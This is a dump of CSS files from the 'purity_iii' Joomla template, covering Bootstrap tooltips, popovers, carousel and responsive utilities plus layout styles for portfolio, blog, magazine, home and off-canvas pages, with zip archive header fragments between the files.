.tooltip.left .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  right: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  left: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip-inner {
  max-width: 350px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  background-color: #000000;
  border-radius: 0;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: left;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 14px;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-left: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-left: -10px;
}
.popover > .arrow {
  border-width: 11px;
}
.popover > .arrow,
.popover > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover > .arrow:after {
  content: "";
  border-width: 10px;
}
.popover.top > .arrow {
  bottom: -11px;
  left: 50%;
  margin-left: -11px;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  border-bottom-width: 0;
}
.popover.top > .arrow:after {
  bottom: 1px;
  margin-left: -10px;
  content: " ";
  border-top-color: #ffffff;
  border-bottom-width: 0;
}
.popover.right > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
  border-left-width: 0;
}
.popover.right > .arrow:after {
  bottom: -10px;
  left: 1px;
  content: " ";
  border-right-color: #ffffff;
  border-left-width: 0;
}
.popover.bottom > .arrow {
  top: -11px;
  left: 50%;
  margin-left: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
}
.popover.bottom > .arrow:after {
  top: 1px;
  margin-left: -10px;
  content: " ";
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-right-width: 0;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.popover.left > .arrow:after {
  right: 1px;
  bottom: -10px;
  content: " ";
  border-right-width: 0;
  border-left-color: #ffffff;
}
.popover-title {
  padding: 8px 14px;
  margin: 0;
  font-size: 14px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: -1 -1 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  width: 100%;
  overflow: hidden;
}
.carousel-inner > .item {
  position: relative;
  display: none;
  -webkit-transition: 0.6s ease-in-out left;
  -o-transition: 0.6s ease-in-out left;
  transition: 0.6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  line-height: 1;
}
@media all and (transform-3d), (-webkit-transform-3d) {
  .carousel-inner > .item {
    -webkit-transition: -webkit-transform 0.6s ease-in-out;
    -moz-transition: -moz-transform 0.6s ease-in-out;
    -o-transition: -o-transform 0.6s ease-in-out;
    transition: transform 0.6s ease-in-out;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-perspective: 1000px;
    -moz-perspective: 1000px;
    perspective: 1000px;
  }
  .carousel-inner > .item.next,
  .carousel-inner > .item.active.right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.prev,
  .carousel-inner > .item.active.left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.next.left,
  .carousel-inner > .item.prev.right,
  .carousel-inner > .item.active {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    left: 0;
  }
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  left: 100%;
}
.carousel-inner > .prev {
  left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  left: 0;
}
.carousel-inner > .active.left {
  left: -100%;
}
.carousel-inner > .active.right {
  left: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  bottom: 0;
  left: 0;
  width: 15%;
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
  background-color: rgba(0, 0, 0, 0);
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control.right {
  right: 0;
  left: auto;
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control:hover,
.carousel-control:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
  margin-top: -10px;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  left: 50%;
  margin-left: -10px;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  right: 50%;
  margin-right: -10px;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  font-family: serif;
  line-height: 1;
}
.carousel-control .icon-prev:before {
  content: "\2039";
}
.carousel-control .icon-next:before {
  content: "\203a";
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  left: 50%;
  z-index: 15;
  width: 60%;
  padding-left: 0;
  margin-left: -30%;
  text-align: center;
  list-style: none;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  cursor: pointer;
  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
  border: 1px solid #ffffff;
  border-radius: 10px;
}
.carousel-indicators .active {
  width: 12px;
  height: 12px;
  margin: 0;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  right: 15%;
  bottom: 20px;
  left: 15%;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -10px;
    font-size: 30px;
  }
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .icon-prev {
    margin-left: -10px;
  }
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-next {
    margin-right: -10px;
  }
  .carousel-caption {
    right: 20%;
    left: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}

.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-header:before,
.modal-header:after,
.modal-footer:before,
.modal-footer:after {
  display: table;
  content: " ";
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-header:after,
.modal-footer:after {
  clear: both;
}
.center-block {
  display: block;
  margin-right: auto;
  margin-left: auto;
}
.pull-right {
  float: right !important;
}
.pull-left {
  float: left !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
.visible-sm,
.visible-md,
.visible-lg {
  display: none !important;
}
.visible-xs-block,
.visible-xs-inline,
.visible-xs-inline-block,
.visible-sm-block,
.visible-sm-inline,
.visible-sm-inline-block,
.visible-md-block,
.visible-md-inline,
.visible-md-inline-block,
.visible-lg-block,
.visible-lg-inline,
.visible-lg-inline-block {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table !important;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-block {
    display: block !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline {
    display: inline !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table !important;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-block {
    display: block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline {
    display: inline !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table !important;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-block {
    display: block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline {
    display: inline !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table !important;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-block {
    display: block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline {
    display: inline !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline-block {
    display: inline-block !important;
  }
}
@media (max-width: 767px) {
  .hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg {
    display: none !important;
  }
}
.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table !important;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
}
.visible-print-block {
  display: none !important;
}
@media print {
  .visible-print-block {
    display: block !important;
  }
}
.visible-print-inline {
  display: none !important;
}
@media print {
  .visible-print-inline {
    display: inline !important;
  }
}
.visible-print-inline-block {
  display: none !important;
}
@media print {
  .visible-print-inline-block {
    display: inline-block !important;
  }
}
@media print {
  .hidden-print {
    display: none !important;
  }
}PKӜ�\���#purity_iii/css/layouts/porfolio.cssnu&1i�.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: 10px;
  margin-bottom: 0;
  padding: 0;
}
.porfolio-items {
  margin-top: 20px;
  padding-top: 20px;
  border-top: 1px solid #eeeeee;
  text-align: center;
}
.porfolio-items .thumbnail {
  border: 0;
  padding: 0;
  margin: 20px 0;
}
.porfolio-items .thumbnail > a {
  color: #444444;
  text-decoration: none;
}
.porfolio-items .thumbnail > a:hover,
.porfolio-items .thumbnail > a:active,
.porfolio-items .thumbnail > a:focus {
  color: #0077bb;
  text-decoration: none;
}
.porfolio-items .item-image {
  float: none !important;
  border: 1px solid #eeeeee;
  padding: 3px;
  position: relative;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.porfolio-items .item-image img {
  width: 100%;
  padding: 0;
}
.porfolio-items .thumbnail > a:hover .item-image,
.porfolio-items .thumbnail > a:active .item-image,
.porfolio-items .thumbnail > a:focus .item-image {
  border-color: #bbbbbb;
}
.porfolio-items .thumbnail > a:hover .item-image img,
.porfolio-items .thumbnail > a:active .item-image img,
.porfolio-items .thumbnail > a:focus .item-image img {
  opacity: .7;
}
.porfolio-items h3 {
  margin-top: 20px;
  margin-bottom: 5px;
  font-weight: 700;
  font-size: 18px;
}
.porfolio-items p {
  color: #666666;
  margin: 0;
}
.porfolio .item-state {
  width: 70px;
  height: 70px;
  background: url(../../images/porfolio-item-states.png) no-repeat center top;
  display: block;
  text-indent: -9999em;
  position: absolute;
  top: -3px;
  right: -3px;
}
.porfolio .state-free {
  background-position: center;
}
.porfolio .state-hot {
  background-position: center bottom;
}
.porfolio .item-demo-url {
  display: inline-block;
  margin-top: 20px;
}PKӜ�\'R�Ĝ�purity_iii/css/layouts/blog.cssnu&1i�.blog .blog-item {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
  padding-bottom: 40px;
}
.blog .blog-item .item-image {
  margin-top: 7px;
  margin-right: 0;
}
.blog .blog-item .item-image.pull-left {
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  .blog .blog-item .item-image.pull-left {
    float: none !important;
  }
}
.blog .blog-item .item-image img {
  max-width: 100%;
  width: 100%;
}
.blog .blog-item .page-header {
  border: 0;
  margin: 0 0 10px;
  padding: 0;
}
.blog .blog-item .page-header h2 {
  margin: 0;
  line-height: 1.3;
}
.blog .blog-item .page-header h2 a:hover,
.blog .blog-item .page-header h2 a:focus,
.blog .blog-item .page-header h2 a:active {
  color: #00466e;
}
.blog .blog-item .article-intro {
  margin-bottom: 20px;
}
.blog .item-page .tags {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.blog .item-page .tags span a {
  background: #eeeeee;
}PKӜ�\*�T���purity_iii/css/layouts/docs.cssnu&1i�.docs-section {
  margin-bottom: 40px;
}
.docs-section .page-header {
  margin-bottom: 20px;
}
.docs-section .page-header h1 {
  font-size: 42px;
}
.example-type h1,
.example-type h2,
.example-type h3,
.example-type h4,
.example-type h5,
.example-type h6 {
  margin: 20px 0;
}
.example-colors .swatch-item {
  width: 100%;
  min-height: 100px;
  position: relative;
  background: #444444;
  color: #fff;
  margin-bottom: 20px;
}
.example-colors .swatch-item dl {
  width: 100%;
  position: absolute;
  bottom: 0;
  padding: 20px;
  margin: 0;
}
.example-colors .color-brand-primary {
  background: #0077bb;
}
.example-colors .color-brand-secondary {
  background: #3e9b52;
}
.example-colors .color-brand-success {
  background: #3e9b52;
}
.example-colors .color-brand-danger {
  background: #cc0000;
}
.example-colors .color-brand-warning {
  background: #ff8800;
}
.example-colors .color-brand-info {
  background: #0099cc;
}
.example-colors .color-gray-darker {
  background: #222222;
}
.example-colors .color-gray-dark {
  background: #444444;
}
.example-colors .color-gray {
  background: #666666;
}
.example-colors .color-gray-light {
  background: #999999;
  color: #444444;
}
.example-colors .color-gray-lighter {
  background: #eeeeee;
  color: #444444;
}
.example-colors .color-gray-lightest {
  background: #f7f7f7;
  color: #444444;
}
.example-buttons .btn,
.example-inputs .btn,
.example-buttons .form-control,
.example-inputs .form-control {
  width: 100%;
  margin-bottom: 20px;
}PKӜ�\�.��$purity_iii/css/layouts/corporate.cssnu&1i�.corporate .slideshow {
  background: #f7f7f7;
  border-bottom: 1px solid #eeeeee;
  padding: 40px 0;
}
.corporate .t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.corporate .t3-sl-1 .t3-module,
.corporate .t3-sl-2 .t3-module,
.corporate .t3-sl-3 .t3-module {
  margin-bottom: 0;
}
.corporate .t3-sl-2 {
  padding: 0;
}
.corporate .carousel-caption {
  background: rgba(0, 0, 0, 0.3);
}
.corporate .t3-module .media {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 10px;
}
.corporate .t3-module .media:last-child {
  border: 0;
  padding: 0;
}
.corporate .items-leading {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
}
.corporate .items-row {
  border-bottom: 1px solid #eeeeee;
}
.corporate .items-row:last-child {
  border: 0;
}PKӜ�\)purity_iii/css/layouts/features-intro.cssnu&1i�PKӜ�\L�A���#purity_iii/css/layouts/magazine.cssnu&1i�.magazine-item:before,
.magazine-featured-leading:before,
.magazine-featured-intro:before,
.magazine-category:before,
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  display: table;
  content: " ";
}
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  clear: both;
}
.magazine .page-subheader h2 {
  font-size: 42px;
}
.magazine-category-title {
  margin-bottom: 20px;
  font-size: 18px;
  background: #eeeeee;
  padding: 10px;
}
.magazine-category-title strong {
  font-weight: 600;
}
.magazine-category-title .fa {
  font-size: 14px;
  position: relative;
  top: -1px;
  left: 2px;
}
.magazine-category-title > a {
  display: inline-block;
  color: #444444;
  text-transform: uppercase;
}
.magazine-category-title > a:hover,
.magazine-category-title > a:active,
.magazine-category-title > a:focus {
  text-decoration: none;
  color: #0077bb;
}
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
}
.magazine-item .page-header h2 {
  margin: 0;
  font-size: 16px;
  line-height: 1.275;
  font-weight: 700;
}
.magazine-item .page-header h2 a:hover,
.magazine-item .page-header h2 a:active,
.magazine-item .page-header h2 a:focus {
  text-decoration: none;
}
.magazine-item .item-image {
  overflow: hidden;
}
.magazine-item .item-image,
.magazine-item .pull-left.item-image,
.magazine-item .pull-right.item-image {
  width: 100%;
  max-width: 100%;
  float: none !important;
  margin-bottom: 20px;
}
.magazine-item .item-image img,
.magazine-item .pull-left.item-image img,
.magazine-item .pull-right.item-image img,
.magazine-item .img_caption {
  width: 100% !important;
  max-width: 100%;
}
.magazine-item .article-aside {
  margin-top: 10px;
  margin-bottom: 10px;
}
.magazine-item .article-info {
  color: #999999;
  margin: 0;
  width: 100%;
}
.magazine-item .article-info dd {
  white-space: inherit;
}
.magazine-item-ct p:last-child {
  margin-bottom: 0;
}
.magazine-leading {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item .page-header h2 {
  font-size: 35px;
}
@media screen and (min-width: 768px) {
  .magazine-leading .magazine-item .item-image {
    max-height: 300px;
  }
}
.magazine-leading .magazine-item .magazine-item-ct {
  font-size: 16px;
}
.magazine-intro {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item .item-image {
  max-height: 120px;
}
.magazine-intro .magazine-item .item-image p.img_caption {
  display: none;
}
.magazine-links {
  margin-top: 40px;
}
.magazine-links::before {
  display: inline-block;
  content: "MORE NEWS";
  background: #444444;
  font-weight: normal;
  padding: 5px 10px;
  margin-bottom: 10px;
  color: #fff;
}
.magazine-links .link-item {
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0 9px;
}
.magazine-links .page-header {
  margin: 0;
}
.magazine-links .page-header h2 {
  font-size: 16px;
}
.magazine-links .article-aside {
  margin-top: 5px;
  margin-bottom: 0;
}
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: 40px;
}
.magazine-category {
  margin-bottom: 40px;
}
.magazine-category .row-articles {
  margin-bottom: 20px;
}
.magazine-category .row-articles:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .magazine-category .row-articles .magazine-item-media {
    padding-right: 0;
  }
}
.magazine-category .magazine-leading {
  margin-bottom: 40px;
}
.magazine-category .magazine-item .category-name {
  display: none;
}
.magazine-category .magazine-item-ct {
  color: #666666;
  font-size: 12px;
}PKӜ�\T9�PPpurity_iii/css/ie8.cssnu&1i�/* Fix: Mouse hover on IE8 */
.navbar-default .navbar-nav > li > a {
  padding-right: 0 !important;
}

.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus,
.navbar-default .navbar-nav > li > a:active {
  background: url(../images/nav-active.gif) repeat-x left bottom transparent;
}

.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  background: url(../images/nav-active.gif) repeat-x left bottom;
}

.custom .media a.pull-left {
  display: block;
  width: 60px;
}PKӜ�\1�o�llpurity_iii/css/windows.cssnu&1i�

.window body {
  height: auto;
  padding: 0;
  margin: 0;
}
.window .window-mainbody {
  padding: 20px;
}
PKӜ�\]��ppurity_iii/css/error.cssnu&1i�body {
  color: #333;
  font-size: 16px;
  font-family: sans-serif;
  line-height: 1.6;
}

a {
  text-decoration: none;
}

.error {
  border: 1px solid #eee;
  border-radius: 5px;
  margin: 100px auto 0;
  max-width: 1200px;
  padding: 24px;
}

#errorboxheader {
  background: #f2dede;
  border: 1px solid #EBCCD1;
  border-radius: 5px;
  color: #A94442;
  font-weight: bold;
  padding: 10px 20px;
}

ol {
  border-bottom: 1px solid #ddd;
  margin-bottom: 20px;
  padding-bottom: 20px;
}

.btn {
  background: #fff;
  border: 1px solid #ddd;
  border-radius: 3px;
  color: #333;
  padding: 5px 10px;
}

.btn-primary {
  background-color: #428BCA;
  border-color: #357EBD;
  color: #fff;
}

.btn-primary:hover {
  background-color: #3276b1;
  border-color: #285e85;
}


#techinfo table.table {
  border-spacing: 0;
  border-collapse: collapse;
  border: 1px solid #ddd;
  width: 100%;
}

#techinfo table.table th, td {
  border: 1px solid #ddd;
  padding: 6px 12px;
}

#techinfo table.table tbody > tr:nth-of-type(2n+1) {
  background-color: #f2f2f2;
}PKӜ�\mAa`[[purity_iii/css/home.cssnu&1i�

.home h1 {
  line-height: 1;
}
.home h2 {
  font-size: 21px;
}
@media screen and (min-width: 768px) {
  .home h2 {
    font-size: 30px;
  }
}
.home .jumbotron {
  background-color: transparent;
  position: relative;
  margin-bottom: 0;
}
.home .t3-sl-1 {
  padding: 0;
  background: #ffffff;
  color: #333333;
  border-bottom: 1px solid #eeeeee;
}
.home .t3-sl-1 .jumbotron {
  border-radius: 0;
}
.home .t3-sl-1 .jumbotron .btn {
  margin-top: 20px;
}
.home .t3-sl-2 {
  text-align: center;
}
.home .t3-sl-2 .img-responsive {
  display: inline-block;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-2 p {
    font-size: 16px;
    line-height: 22px;
  }
}
.home .t3-sl-3 p > img {
  margin-top: 20px;
}
@media screen and (min-width: 992px) {
  .home .t3-sl-3 p > img {
    margin-top: 0;
  }
}
.home .t3-sl-3,
.home .t3-sl-4 {
  border-top: 1px solid #eeeeee;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-3 p,
  .home .t3-sl-4 p {
    font-size: 16px;
    line-height: 22px;
  }
}
.home .t3-sl-3 .jumbotron,
.home .t3-sl-4 .jumbotron {
  padding-top: 0;
}
.home .t3-sl-3 .jumbotron h1,
.home .t3-sl-4 .jumbotron h1 {
  margin-bottom: 10px;
  margin-top: 0;
}
.home .t3-sl-3 .jumbotron p,
.home .t3-sl-4 .jumbotron p {
  font-size: 18px;
  line-height: 1.25;
  color: #999999;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-3 .jumbotron p,
  .home .t3-sl-4 .jumbotron p {
    font-size: 21px;
  }
}
.home .t3-sl-5 {
  background: #ffffff;
  color: #333333;
  border-top: 1px solid #eeeeee;
  padding: 0;
}
.home .t3-sl-5 .jumbotron {
  border-radius: 0;
  margin-bottom: 0;
}
PKӜ�\��q�3O3Opurity_iii/css/off-canvas.cssnu&1i�.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #ffffff;
  position: relative;
  left: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.t3-mainnav-android {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-open .t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow: hidden;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  right: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  left: auto;
  right: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.off-canvas-open .t3-off-canvas {
  overflow-y: auto;
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #0077bb;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #00466e;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
